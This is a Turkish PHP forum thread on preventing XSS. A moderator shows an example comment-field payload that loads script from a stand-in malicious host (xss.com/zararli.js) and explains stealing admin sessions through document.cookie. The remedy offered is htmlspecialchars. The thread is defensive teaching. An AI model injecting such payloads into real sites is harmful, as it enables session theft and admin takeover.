Php ile xss engelleme

177
paradiz
PHP Geliştirme
71
1

*****
Moderatör
Konuyu Başlatan
Moderatör
  • 653
  • 594
  • 6

Para: 6,742.46TL
#1
Çoğu türk sitesinde karşılaştığımız xss açığı veri ekleme bölümlerin de kullanılınca ileri boyutta bir açık haline geliyor.


Size şöyle anlatayım ki veri ekleme yani sql verisi ekleme veya $_GET veya $_POST eklenen sql verisinde form’dan gelen veriyi sqle html engellemeden geçiriyorsa veya veri htmlspecialchars tagı altında gösterilmiyorsa bu ciddi bir açık haline geliyor.

Örnek olarak siteniz.com/yorum_ekle.php?yorum=<script src=http://xss.com/zararli.js></script>

Bu eklenen veri siteniz.com/yorumlar.php bölümünde xss engellenmeden paylaşılırsa js içinde ki koda göre admin cookie çalınabilir veya sitenizde html kod çalıştırılabilir

Javascript ile session almak basit document.cookie ile sitede ki sessionları çalabilirsiniz çalınan bu sessionlar ile admin panele şifresiz giriş yapabilirsiniz gerekli cookie manager eklentileri ile

Php’de html engellemek için örnek olarak ;

$veri = $_POST[“yorum”]; değişken bu ise şu şekilde değiştirelim $veri = htmlspecialchars($_POST[“yorum”]); girilen herhangi bir html veri html olarak çalışmayacaktır.

Onun dışında bir fonksiyon açıp gelen verideki < ve > yi engellersek veya html taglarını engellersek yine html kod çalışmıyacaktır

Yani eğer script yazıyorsanız xss açığını dikkate almanız gerek sonuçları ağır olabilir
*
Çalışkan Üye
Kullanıcı
  • 6
  • 2
  • 27

Para: -10.18TL
#2
Yeni açılan bir foruma göre bilgin bir paylaşım olmuş tebrikler
Önceki Konu
Sonraki Konu



Hızlı Menü:

Konuyu Okuyanlar:
1 Ziyaretçi